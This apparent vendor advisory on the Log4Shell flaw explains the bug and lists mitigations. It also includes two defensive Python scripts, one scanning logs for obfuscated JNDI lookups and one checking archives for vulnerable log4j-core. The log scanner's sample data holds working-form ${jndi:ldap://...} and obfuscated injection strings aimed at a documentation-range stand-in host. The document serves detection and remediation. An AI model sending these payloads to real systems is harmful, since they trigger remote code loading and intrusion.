UPDATE: Cybereason researchers have released an updated "vaccine" with a permanent mitigation option for the Log4Shell vulnerabilities (CVE-2021-44228 and CVE-2021-45046), which is freely available on GitHub and relatively simple to implement... - more details here...
A vulnerability in Log4j 2, affecting versions 2.0-beta9 through 2.14.1, was disclosed on the project's GitHub on December 9, 2021 and assigned CVE-2021-44228 with a CVSS base score of 10.0, the highest possible. The flaw has been dubbed Log4Shell.
Log4j 2 is an open source Java logging library used in a wide range of software applications and services around the world. The vulnerability lets an unauthenticated attacker achieve Remote Code Execution (RCE) on any application, internet-facing or not, that logs attacker-controlled input with a vulnerable version of the library. What matters is not the server type but whether attacker-supplied data (a User-Agent header, a username, a form field) reaches a Log4j log statement.
From the CVE-2021-44228 description: "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled." In practice the attacker embeds a lookup such as ${jndi:ldap://attacker-host/x} in data that gets logged; Log4j resolves the lookup, connects to the attacker's server and follows the reference it returns. The impact is likely to be very widespread. There are already reports that threat actors are actively engaged in mass Internet scanning to identify servers vulnerable to exploitation.
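Because the scanning traffic described above shows up first in web server access logs, a detection that only greps for the literal string `${jndi:` misses the obfuscated variants (nested `${lower:j}`, `${::-j}` and `${env:X:-j}` lookups) that scanners switched to within days. The following Python scanner is an added example written for this page, not Cybereason's tooling: it collapses nested lookups from the inside out, using only the handful of evaluation rules detection needs, and then matches the normalized text. The log lines are constructed and the addresses are from a documentation range.

```python
import re
import sys

# Innermost ${...} lookup: one containing no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once obfuscation has been collapsed: ${jndi:<scheme>://<target>}
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^}]*)\}", re.IGNORECASE)

# Constructed Apache-style access log lines; 198.51.100.0/24 is a documentation range.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 400 0 "-" "-"',
    '10.0.0.9 - - [10/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:13 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NOPE:-j}ndi:dns://198.51.100.7/d}"',
    '10.0.0.12 - - [10/Dec/2021:03:14:20 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 9001 "-" "curl/7.79"',
]


def _resolve(body: str) -> str:
    """Evaluate the inner lookups attackers use to spell "jndi" piecewise.

    Mirrors Log4j only as far as detection needs:
      ${env:NOPE:-j}, ${sys:x:-j}, ${::-j}  -> the ":-" default value ("j")
      ${lower:J}, ${upper:j}               -> case-converted argument
    Anything else is returned unchanged so normalize() terminates.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    head, sep, arg = body.partition(":")
    if sep and head.lower() == "lower":
        return arg.lower()
    if sep and head.lower() == "upper":
        return arg.upper()
    return "${" + body + "}"


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines):
    """One finding per log line that contains a (possibly obfuscated) JNDI lookup."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            findings.append({
                "line": lineno,
                "scheme": m.group(1).lower(),
                "target": m.group(2),
                "normalized": m.group(0),
            })
    return findings


if __name__ == "__main__":
    # "python scan.py -" reads a real access log from stdin; no argument runs the sample.
    lines = sys.stdin.read().splitlines() if sys.argv[1:] == ["-"] else SAMPLE_LOG
    for f in scan_lines(lines):
        print(f'line {f["line"]}: {f["scheme"]} lookup -> {f["target"]}   ({f["normalized"]})')
```

The plain mention of "jndi" in the last sample line is not flagged because it is not inside a `${...}` lookup; conversely, a hit on an internal host is worth investigating even when the request returned 400, since Log4j evaluates the lookup regardless of what the application did with the request.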
Cybereason is aware of the vulnerability and has completed verification that this issue does not affect Cybereason products or services.
For those who are concerned about closing third-party vulnerabilities (i.e., products aside from Cybereason), the following are some proactive measures organizations can take to reduce the risk posed by CVE-2021-44228:
- Upgrade log4j-core. Apache's fix for CVE-2021-44228 shipped in Log4j 2.15.0 (the "2.15.0-rc2" build referenced in early guidance); all releases from 2.0-beta9 through 2.14.1 are affected. Because the update note above also covers CVE-2021-45046, which was addressed in 2.16.0 by removing message lookups and disabling JNDI by default, treat 2.16.0 as the minimum on Java 8.
- Where you cannot upgrade yet and are on Log4j 2.10.0 or later, disable message lookup substitution by starting the JVM with the system property log4j2.formatMsgNoLookups=true (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true). This stops ${jndi:...} in logged data from being expanded at all; it does not block JNDI requests as such. Note that for CVE-2021-45046 this flag was shown to be insufficient in some non-default Pattern Layout configurations (Context Lookups and Thread Context Map patterns), which is why guidance moved to upgrading. For releases older than 2.10.0, where the property does not exist, remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar.
- Check the JDK's JNDI hardening. Since Java 8u121, com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase default to false, and since 8u191 com.sun.jndi.ldap.object.trustURLCodebase does too, so a current JDK refuses to load classes from a remote codebase returned by an RMI, CORBA or LDAP reference. Verify these have not been set to true on your JVMs, but do not rely on them as a fix: with remote class loading closed, attackers pivot to Java deserialization gadgets and to factory classes already on the application's classpath, so the JDK defaults reduce the risk without removing it.
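To turn the upgrade item into a repeatable check, the script below is an added example written for this page (not Cybereason's or Apache's tooling). It walks a directory, opens every jar/war/ear including jars nested inside other archives, reads the log4j-core version from the artifact's pom.properties, and reports whether org/apache/logging/log4j/core/lookup/JndiLookup.class is still present. The thresholds encode the facts above (fixed in 2.15.0; 2.16.0 for CVE-2021-45046). The build_sample_jar helper constructs stand-in archives holding only the two entries the scanner reads, so the demo runs offline; a jar that shades (relocates) the Log4j packages changes that class path and is not detected by this check.

```python
import io
import re
import sys
import zipfile
from pathlib import Path

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")


def parse_version(v: str):
    """'2.14.1' -> (2, 14, 1). A '-rcN' or '-betaN' suffix is dropped (treated as the release)."""
    return tuple(int(p) for p in v.split("-", 1)[0].split(".") if p.isdigit())


def classify(version, has_jndi_lookup: bool) -> str:
    if not has_jndi_lookup:
        return "mitigated: JndiLookup.class removed"
    if version is None:
        return "unknown version: inspect manually"
    if version < (2, 15, 0):
        return "VULNERABLE: CVE-2021-44228 (upgrade)"
    if version < (2, 16, 0):
        return "PARTIAL: 2.15.0 still affected by CVE-2021-45046 in some configs"
    return "fixed for CVE-2021-44228/45046"


def assess_archive(data: bytes, name: str, findings=None):
    """Inspect one archive given as bytes; recurse into archives nested in WAR/EAR/fat jars."""
    findings = [] if findings is None else findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip container, nothing to inspect
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_LOOKUP in names:
            version = None
            if POM_PROPS in names:
                m = re.search(rb"^version=(.+)$", zf.read(POM_PROPS), re.M)
                if m:
                    version = parse_version(m.group(1).decode().strip())
            findings.append({
                "archive": name,
                "version": version,
                "jndi_lookup_present": JNDI_LOOKUP in names,
                "status": classify(version, JNDI_LOOKUP in names),
            })
        for inner in names:
            if inner.lower().endswith(NESTED):
                assess_archive(zf.read(inner), f"{name}!{inner}", findings)
    return findings


def scan_path(root: str):
    out = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in NESTED:
            assess_archive(p.read_bytes(), str(p), out)
    return out


def build_sample_jar(version: str, keep_lookup: bool = True, wrap_in_war: bool = False) -> bytes:
    """Constructed stand-in for a log4j-core jar: only the two entries the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if keep_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only, not a real class
    jar = buf.getvalue()
    if not wrap_in_war:
        return jar
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr(f"WEB-INF/lib/log4j-core-{version}.jar", jar)
    return war.getvalue()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_path(sys.argv[1])  # e.g. python log4j_check.py /opt
    else:  # demo on constructed archives
        results = []
        for v, keep, war in [("2.14.1", True, False), ("2.14.1", False, False),
                             ("2.15.0", True, True), ("2.16.0", True, False)]:
            assess_archive(build_sample_jar(v, keep, war), f"sample-{v}", results)
    for r in results:
        print(f'{r["status"]:<64} {r["archive"]}')
```

Run it against application directories, container image layers and build caches rather than only system package lists, since Log4j is most often bundled inside an application's own WAR or fat jar where the OS package manager never sees it.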
If you believe your organization has already potentially been compromised through exploitation of CVE-2021-44228, contact the Cybereason Incident Response Team or reach out to your Cybereason representative for immediate assistance. We are here to help and will provide tools and information to assist others as this vulnerability continues to evolve.